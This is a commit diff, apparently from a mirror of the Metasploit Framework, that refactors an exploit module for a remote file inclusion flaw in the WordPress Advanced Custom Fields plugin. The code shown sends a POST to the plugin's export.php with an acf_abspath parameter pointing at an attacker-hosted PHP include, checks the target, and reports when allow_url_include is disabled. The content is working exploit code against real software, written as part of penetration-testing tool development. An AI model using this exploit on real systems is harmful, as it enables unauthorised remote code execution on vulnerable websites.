infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Multiple change for Juan 

Incooperated changes as per Juan's suggestions.

- Removed redundant space option for the payload
- Doing the uri more intelligently
- Detecting allow_url_include being disabled and reporting it
- Moved to unix/webapp
- Removed redundant handler call
- Adding to description that this requires allow_url_include to be
enabled
bug/bundler_fix
Charlie Eriksen 2013-01-02 21:19:06 +00:00
parent 78c6d04b31
commit 97253d46a1
1 changed files with 11 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb → modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb
View File

@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a remote file inclusion flaw in the WordPress
blogging software plugin known as Advanced Custom Fields. The vulnerability allows for
remote file inclusion and remote code execution via the export.php script. The
Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable.
Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit
only works when the php option allow_url_include is set to On(Default Off).
},
'Author' =>
[
@ -40,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote
{
'ConnectionType' => 'find',
},
'Space' => 262144, # 256k
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
@ -58,10 +58,12 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
uri << datastore['PLUGINSPATH']
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php"
'uri' => "#{uri}advanced-custom-fields/core/api.php"
})
if res and res.code == 200
@ -72,25 +74,24 @@ class Metasploit3 < Msf::Exploit::Remote
end
def php_exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php"
uri << datastore['PLUGINSPATH']
uri << '/' if uri[-1,1] != '/'
print_status('Sending request')
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}#{plugin_path}",
'uri' => "#{uri}advanced-custom-fields/core/actions/export.php",
'data' => "acf_abspath=#{php_include_url}"
})
if res and res.code != 200
if res and res.body =~ /allow_url_include/
fail_with(Exploit::Failure::NotVulnerable, 'allow_url_include is disabled')
elsif res.code != 200
fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
end
handler
end
end